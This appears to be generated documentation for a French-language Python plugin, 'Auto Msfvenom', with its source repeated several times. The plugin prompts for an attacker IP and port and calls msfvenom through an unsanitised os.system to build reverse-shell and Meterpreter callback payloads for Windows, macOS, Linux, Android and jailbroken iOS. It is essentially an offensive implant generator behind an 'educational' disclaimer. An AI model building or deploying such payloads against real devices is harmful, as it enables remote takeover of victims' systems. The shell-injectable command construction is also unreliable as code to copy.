clarity.tools.automsf

  1import os 
  2from clarity.core import ClarityTool, Colors, soft_input
  3import sys 
  4
  5
  6class Msfvenom(ClarityTool):
  7    """Un outil pour générer des payloads avec msfvenom. [Added via plugin, no auto install yet]"""
  8
  9    TITLE = "Auto Msfvenom"
 10    DESCRIPTION = "Générateur de payloads pour Metasploit Framework.[Added via plugin, no auto install yet]"
 11
 12    def __init__(self):
 13        super().__init__(options=[
 14            ("Générer un payload", self.gen_msfvenom)
 15        ], installable=False, runnable=True)
 16
 17    def gen_payloads(self, payload, lhost, lport, fmt, outfile):
 18        print(f"{Colors.GREEN}[+] Génération du payload...{Colors.RESET}")
 19        command = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}"
 20        print(f"{Colors.CYAN}Commande : {command}{Colors.RESET}")
 21        os.system(command)
 22
 23
 24    def gen_msfvenom(self):
 25        # les soft_inputs
 26        print(f"{Colors.RED}[!]IMPORTANT: Je ne suis pas responsable de ce que tu fais avec ce script, ceci est a but éducatif{Colors.RESET}")
 27        LHOST = soft_input(f"{Colors.YELLOW}Ton ip?: ")
 28        LPORT = soft_input(f"Le port?: ")
 29        print(Colors.RESET)
 30
 31        print(f"{Colors.CYAN}-------MSFVENOM DKP MENU----------")
 32        print("")
 33        print(f"{Colors.RED}[!]IMPORATANT: Nécéssite METASPLOIT{Colors.CYAN}")
 34        print("")
 35        print("[1]: Windows")
 36        print("[2]: Mac")
 37        print("[3]: Linux")
 38        print("[4]: Android")
 39        print("[5]: Ios")
 40        print("[0]: Exit")
 41        print(f"{Colors.RESET}")
 42        choice = soft_input(f"{Colors.ORANGE}Quelles est la catégorie demandé?(entré le bon numéro): {Colors.RESET}")
 43
 44        if choice == "1":
 45            print("")
 46            print(f"{Colors.CYAN}---------WINDOWS-------")
 47            print("[1]: Windows Meterpreter Reverse Tcp")
 48            print("[2]: Windows Shell Reverse Tcp")
 49            print("[3]: Windows Meterpreter Reverse Https")
 50            print(f"[0]: Exit {Colors.RESET}")
 51            win_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Windows?: {Colors.RESET}")
 52            if win_choice == "1":
 53                Msfvenom.gen_payloads("windows/meterpreter/reverse_tcp", LHOST, LPORT, "exe", "payload_win_meter_tcp.exe")
 54            elif win_choice == "2":
 55                Msfvenom.gen_payloads("windows/shell/reverse_tcp", LHOST, LPORT, "exe", "payload_win_shell_tcp.exe")
 56            elif win_choice == "3":
 57                Msfvenom.gen_payloads("windows/meterpreter/reverse_https", LHOST, LPORT, "exe", "payload_win_meter_https.exe")
 58            elif win_choice == "0":
 59                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
 60                sys.exit(0)
 61            else:
 62                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
 63                sys.exit(0)
 64
 65        elif choice == "2":
 66            print("")
 67            print(f"{Colors.CYAN}---------MAC-------")
 68            print("[1]: Mac Meterpreter Reverse Tcp")
 69            print("[2]: Mac Meterpreter Reverse Shell")
 70            print("[3]: Mac Meterpreter Reverse Https")
 71            print(f"[0]: Exit {Colors.RESET}")
 72            mac_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Mac?: {Colors.RESET}")
 73            if mac_choice == "1":
 74                Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_meter_tcp.macho")
 75            elif mac_choice == "2":
 76                Msfvenom.gen_payloads("osx/x64/shell_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_shell_tcp.macho")
 77            elif mac_choice == "3":
 78                Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_https", LHOST, LPORT, "macho", "payload_mac_meter_https.macho")
 79            elif mac_choice == "0":
 80                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
 81                sys.exit(0)
 82            else:
 83                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
 84                sys.exit(0)
 85
 86        elif choice == "3":
 87            print("")
 88            print(f"{Colors.CYAN}---------LINUX-------")
 89            print("[1]: Linux Meterpreter Reverse Tcp")
 90            print("[2]: Linux Meterpreter Reverse Shell")
 91            print("[3]: Linux Meterpreter Reverse Https")
 92            print(f"[0]: Exit {Colors.RESET}")
 93            lin_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Linux?: {Colors.RESET}")
 94            if lin_choice == "1":
 95                Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_meter_tcp.elf")
 96            elif lin_choice == "2":
 97                Msfvenom.gen_payloads("linux/x64/shell_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_shell_tcp.elf")
 98            elif lin_choice == "3":
 99                Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_https", LHOST, LPORT, "elf", "payload_lin_meter_https.elf")
100            elif lin_choice == "0":
101                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
102                sys.exit(0)
103            else:
104                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
105                sys.exit(0)
106
107
108        elif choice == "4":
109            print("")
110            print(f"{Colors.CYAN}---------Android-------")
111            print("[1]: Android Meterpreter Reverse Tcp")
112            print("[2]: Android Meterpreter Reverse Shell")
113            print("[3]: Android Meterpreter Reverse Https")
114            print(f"[0]: Exit {Colors.RESET}")
115            and_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Android?: {Colors.RESET}")
116            if and_choice == "1":
117                Msfvenom.gen_payloads("android/meterpreter/reverse_tcp", LHOST, LPORT, "apk", "payload_and_meter_tcp.apk")
118            elif and_choice == "2":
119                Msfvenom.gen_payloads("android/shell/reverse_tcp", LHOST, LPORT, "apk", "payload_and_shell_tcp.apk")
120            elif and_choice == "3":
121                Msfvenom.gen_payloads("android/meterpreter/reverse_https", LHOST, LPORT, "apk", "payload_and_meter_https.apk")
122            elif and_choice == "0":
123                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
124                sys.exit(0)
125            else:
126                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
127                sys.exit(0)
128
129        elif choice == "5":
130            print("")
131            print(f"{Colors.CYAN}---------IOS-------")
132            print(f"{Colors.RED}Nécéssite que l'appareil soit JAILBREAKE{Colors.CYAN}")
133            print("[1]: IOS Meterpreter Reverse Tcp")
134            print("[2]: IOS Meterpreter Reverse Shell")
135            print("[3]: IOS Meterpreter Reverse Https")
136            print(f"[0]: Exit {Colors.RESET}")
137            ios_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload IOS?: {Colors.RESET}")
138            if ios_choice == "1":
139                Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_meter_tcp.ipa")
140            elif ios_choice == "2":
141                Msfvenom.gen_payloads("apple_ios/aarch64/shell_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_shell_tcp.ipa")
142            elif ios_choice == "3":
143                Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_https", LHOST, LPORT, "ipa", "payload_ios_meter_https.ipa")
144            elif ios_choice == "0":
145                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
146                sys.exit(0)
147            else:
148                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
149                sys.exit(0)
150
151        
152        else:
153            print(f"{Colors.RED}Entrée non reconnu: Fin du script{Colors.RESET}")
154            sys.exit(0)
class Msfvenom(clarity.core.ClarityTool):
  7class Msfvenom(ClarityTool):
  8    """Un outil pour générer des payloads avec msfvenom. [Added via plugin, no auto install yet]"""
  9
 10    TITLE = "Auto Msfvenom"
 11    DESCRIPTION = "Générateur de payloads pour Metasploit Framework.[Added via plugin, no auto install yet]"
 12
 13    def __init__(self):
 14        super().__init__(options=[
 15            ("Générer un payload", self.gen_msfvenom)
 16        ], installable=False, runnable=True)
 17
 18    def gen_payloads(self, payload, lhost, lport, fmt, outfile):
 19        print(f"{Colors.GREEN}[+] Génération du payload...{Colors.RESET}")
 20        command = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}"
 21        print(f"{Colors.CYAN}Commande : {command}{Colors.RESET}")
 22        os.system(command)
 23
 24
 25    def gen_msfvenom(self):
 26        # les soft_inputs
 27        print(f"{Colors.RED}[!]IMPORTANT: Je ne suis pas responsable de ce que tu fais avec ce script, ceci est a but éducatif{Colors.RESET}")
 28        LHOST = soft_input(f"{Colors.YELLOW}Ton ip?: ")
 29        LPORT = soft_input(f"Le port?: ")
 30        print(Colors.RESET)
 31
 32        print(f"{Colors.CYAN}-------MSFVENOM DKP MENU----------")
 33        print("")
 34        print(f"{Colors.RED}[!]IMPORATANT: Nécéssite METASPLOIT{Colors.CYAN}")
 35        print("")
 36        print("[1]: Windows")
 37        print("[2]: Mac")
 38        print("[3]: Linux")
 39        print("[4]: Android")
 40        print("[5]: Ios")
 41        print("[0]: Exit")
 42        print(f"{Colors.RESET}")
 43        choice = soft_input(f"{Colors.ORANGE}Quelles est la catégorie demandé?(entré le bon numéro): {Colors.RESET}")
 44
 45        if choice == "1":
 46            print("")
 47            print(f"{Colors.CYAN}---------WINDOWS-------")
 48            print("[1]: Windows Meterpreter Reverse Tcp")
 49            print("[2]: Windows Shell Reverse Tcp")
 50            print("[3]: Windows Meterpreter Reverse Https")
 51            print(f"[0]: Exit {Colors.RESET}")
 52            win_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Windows?: {Colors.RESET}")
 53            if win_choice == "1":
 54                Msfvenom.gen_payloads("windows/meterpreter/reverse_tcp", LHOST, LPORT, "exe", "payload_win_meter_tcp.exe")
 55            elif win_choice == "2":
 56                Msfvenom.gen_payloads("windows/shell/reverse_tcp", LHOST, LPORT, "exe", "payload_win_shell_tcp.exe")
 57            elif win_choice == "3":
 58                Msfvenom.gen_payloads("windows/meterpreter/reverse_https", LHOST, LPORT, "exe", "payload_win_meter_https.exe")
 59            elif win_choice == "0":
 60                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
 61                sys.exit(0)
 62            else:
 63                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
 64                sys.exit(0)
 65
 66        elif choice == "2":
 67            print("")
 68            print(f"{Colors.CYAN}---------MAC-------")
 69            print("[1]: Mac Meterpreter Reverse Tcp")
 70            print("[2]: Mac Meterpreter Reverse Shell")
 71            print("[3]: Mac Meterpreter Reverse Https")
 72            print(f"[0]: Exit {Colors.RESET}")
 73            mac_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Mac?: {Colors.RESET}")
 74            if mac_choice == "1":
 75                Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_meter_tcp.macho")
 76            elif mac_choice == "2":
 77                Msfvenom.gen_payloads("osx/x64/shell_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_shell_tcp.macho")
 78            elif mac_choice == "3":
 79                Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_https", LHOST, LPORT, "macho", "payload_mac_meter_https.macho")
 80            elif mac_choice == "0":
 81                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
 82                sys.exit(0)
 83            else:
 84                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
 85                sys.exit(0)
 86
 87        elif choice == "3":
 88            print("")
 89            print(f"{Colors.CYAN}---------LINUX-------")
 90            print("[1]: Linux Meterpreter Reverse Tcp")
 91            print("[2]: Linux Meterpreter Reverse Shell")
 92            print("[3]: Linux Meterpreter Reverse Https")
 93            print(f"[0]: Exit {Colors.RESET}")
 94            lin_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Linux?: {Colors.RESET}")
 95            if lin_choice == "1":
 96                Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_meter_tcp.elf")
 97            elif lin_choice == "2":
 98                Msfvenom.gen_payloads("linux/x64/shell_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_shell_tcp.elf")
 99            elif lin_choice == "3":
100                Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_https", LHOST, LPORT, "elf", "payload_lin_meter_https.elf")
101            elif lin_choice == "0":
102                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
103                sys.exit(0)
104            else:
105                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
106                sys.exit(0)
107
108
109        elif choice == "4":
110            print("")
111            print(f"{Colors.CYAN}---------Android-------")
112            print("[1]: Android Meterpreter Reverse Tcp")
113            print("[2]: Android Meterpreter Reverse Shell")
114            print("[3]: Android Meterpreter Reverse Https")
115            print(f"[0]: Exit {Colors.RESET}")
116            and_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Android?: {Colors.RESET}")
117            if and_choice == "1":
118                Msfvenom.gen_payloads("android/meterpreter/reverse_tcp", LHOST, LPORT, "apk", "payload_and_meter_tcp.apk")
119            elif and_choice == "2":
120                Msfvenom.gen_payloads("android/shell/reverse_tcp", LHOST, LPORT, "apk", "payload_and_shell_tcp.apk")
121            elif and_choice == "3":
122                Msfvenom.gen_payloads("android/meterpreter/reverse_https", LHOST, LPORT, "apk", "payload_and_meter_https.apk")
123            elif and_choice == "0":
124                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
125                sys.exit(0)
126            else:
127                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
128                sys.exit(0)
129
130        elif choice == "5":
131            print("")
132            print(f"{Colors.CYAN}---------IOS-------")
133            print(f"{Colors.RED}Nécéssite que l'appareil soit JAILBREAKE{Colors.CYAN}")
134            print("[1]: IOS Meterpreter Reverse Tcp")
135            print("[2]: IOS Meterpreter Reverse Shell")
136            print("[3]: IOS Meterpreter Reverse Https")
137            print(f"[0]: Exit {Colors.RESET}")
138            ios_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload IOS?: {Colors.RESET}")
139            if ios_choice == "1":
140                Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_meter_tcp.ipa")
141            elif ios_choice == "2":
142                Msfvenom.gen_payloads("apple_ios/aarch64/shell_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_shell_tcp.ipa")
143            elif ios_choice == "3":
144                Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_https", LHOST, LPORT, "ipa", "payload_ios_meter_https.ipa")
145            elif ios_choice == "0":
146                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
147                sys.exit(0)
148            else:
149                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
150                sys.exit(0)
151
152        
153        else:
154            print(f"{Colors.RED}Entrée non reconnu: Fin du script{Colors.RESET}")
155            sys.exit(0)

Un outil pour générer des payloads avec msfvenom. [Added via plugin, no auto install yet]

TITLE = 'Auto Msfvenom'
DESCRIPTION = 'Générateur de payloads pour Metasploit Framework.[Added via plugin, no auto install yet]'
def gen_payloads(self, payload, lhost, lport, fmt, outfile):
18    def gen_payloads(self, payload, lhost, lport, fmt, outfile):
19        print(f"{Colors.GREEN}[+] Génération du payload...{Colors.RESET}")
20        command = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}"
21        print(f"{Colors.CYAN}Commande : {command}{Colors.RESET}")
22        os.system(command)
def gen_msfvenom(self):
 25    def gen_msfvenom(self):
 26        # les soft_inputs
 27        print(f"{Colors.RED}[!]IMPORTANT: Je ne suis pas responsable de ce que tu fais avec ce script, ceci est a but éducatif{Colors.RESET}")
 28        LHOST = soft_input(f"{Colors.YELLOW}Ton ip?: ")
 29        LPORT = soft_input(f"Le port?: ")
 30        print(Colors.RESET)
 31
 32        print(f"{Colors.CYAN}-------MSFVENOM DKP MENU----------")
 33        print("")
 34        print(f"{Colors.RED}[!]IMPORATANT: Nécéssite METASPLOIT{Colors.CYAN}")
 35        print("")
 36        print("[1]: Windows")
 37        print("[2]: Mac")
 38        print("[3]: Linux")
 39        print("[4]: Android")
 40        print("[5]: Ios")
 41        print("[0]: Exit")
 42        print(f"{Colors.RESET}")
 43        choice = soft_input(f"{Colors.ORANGE}Quelles est la catégorie demandé?(entré le bon numéro): {Colors.RESET}")
 44
 45        if choice == "1":
 46            print("")
 47            print(f"{Colors.CYAN}---------WINDOWS-------")
 48            print("[1]: Windows Meterpreter Reverse Tcp")
 49            print("[2]: Windows Shell Reverse Tcp")
 50            print("[3]: Windows Meterpreter Reverse Https")
 51            print(f"[0]: Exit {Colors.RESET}")
 52            win_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Windows?: {Colors.RESET}")
 53            if win_choice == "1":
 54                Msfvenom.gen_payloads("windows/meterpreter/reverse_tcp", LHOST, LPORT, "exe", "payload_win_meter_tcp.exe")
 55            elif win_choice == "2":
 56                Msfvenom.gen_payloads("windows/shell/reverse_tcp", LHOST, LPORT, "exe", "payload_win_shell_tcp.exe")
 57            elif win_choice == "3":
 58                Msfvenom.gen_payloads("windows/meterpreter/reverse_https", LHOST, LPORT, "exe", "payload_win_meter_https.exe")
 59            elif win_choice == "0":
 60                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
 61                sys.exit(0)
 62            else:
 63                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
 64                sys.exit(0)
 65
 66        elif choice == "2":
 67            print("")
 68            print(f"{Colors.CYAN}---------MAC-------")
 69            print("[1]: Mac Meterpreter Reverse Tcp")
 70            print("[2]: Mac Meterpreter Reverse Shell")
 71            print("[3]: Mac Meterpreter Reverse Https")
 72            print(f"[0]: Exit {Colors.RESET}")
 73            mac_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Mac?: {Colors.RESET}")
 74            if mac_choice == "1":
 75                Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_meter_tcp.macho")
 76            elif mac_choice == "2":
 77                Msfvenom.gen_payloads("osx/x64/shell_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_shell_tcp.macho")
 78            elif mac_choice == "3":
 79                Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_https", LHOST, LPORT, "macho", "payload_mac_meter_https.macho")
 80            elif mac_choice == "0":
 81                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
 82                sys.exit(0)
 83            else:
 84                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
 85                sys.exit(0)
 86
 87        elif choice == "3":
 88            print("")
 89            print(f"{Colors.CYAN}---------LINUX-------")
 90            print("[1]: Linux Meterpreter Reverse Tcp")
 91            print("[2]: Linux Meterpreter Reverse Shell")
 92            print("[3]: Linux Meterpreter Reverse Https")
 93            print(f"[0]: Exit {Colors.RESET}")
 94            lin_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Linux?: {Colors.RESET}")
 95            if lin_choice == "1":
 96                Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_meter_tcp.elf")
 97            elif lin_choice == "2":
 98                Msfvenom.gen_payloads("linux/x64/shell_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_shell_tcp.elf")
 99            elif lin_choice == "3":
100                Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_https", LHOST, LPORT, "elf", "payload_lin_meter_https.elf")
101            elif lin_choice == "0":
102                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
103                sys.exit(0)
104            else:
105                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
106                sys.exit(0)
107
108
109        elif choice == "4":
110            print("")
111            print(f"{Colors.CYAN}---------Android-------")
112            print("[1]: Android Meterpreter Reverse Tcp")
113            print("[2]: Android Meterpreter Reverse Shell")
114            print("[3]: Android Meterpreter Reverse Https")
115            print(f"[0]: Exit {Colors.RESET}")
116            and_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Android?: {Colors.RESET}")
117            if and_choice == "1":
118                Msfvenom.gen_payloads("android/meterpreter/reverse_tcp", LHOST, LPORT, "apk", "payload_and_meter_tcp.apk")
119            elif and_choice == "2":
120                Msfvenom.gen_payloads("android/shell/reverse_tcp", LHOST, LPORT, "apk", "payload_and_shell_tcp.apk")
121            elif and_choice == "3":
122                Msfvenom.gen_payloads("android/meterpreter/reverse_https", LHOST, LPORT, "apk", "payload_and_meter_https.apk")
123            elif and_choice == "0":
124                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
125                sys.exit(0)
126            else:
127                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
128                sys.exit(0)
129
130        elif choice == "5":
131            print("")
132            print(f"{Colors.CYAN}---------IOS-------")
133            print(f"{Colors.RED}Nécéssite que l'appareil soit JAILBREAKE{Colors.CYAN}")
134            print("[1]: IOS Meterpreter Reverse Tcp")
135            print("[2]: IOS Meterpreter Reverse Shell")
136            print("[3]: IOS Meterpreter Reverse Https")
137            print(f"[0]: Exit {Colors.RESET}")
138            ios_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload IOS?: {Colors.RESET}")
139            if ios_choice == "1":
140                Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_meter_tcp.ipa")
141            elif ios_choice == "2":
142                Msfvenom.gen_payloads("apple_ios/aarch64/shell_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_shell_tcp.ipa")
143            elif ios_choice == "3":
144                Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_https", LHOST, LPORT, "ipa", "payload_ios_meter_https.ipa")
145            elif ios_choice == "0":
146                print(f"{Colors.YELLOW}Fin{Colors.RESET}")
147                sys.exit(0)
148            else:
149                print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}")
150                sys.exit(0)
151
152        
153        else:
154            print(f"{Colors.RED}Entrée non reconnu: Fin du script{Colors.RESET}")
155            sys.exit(0)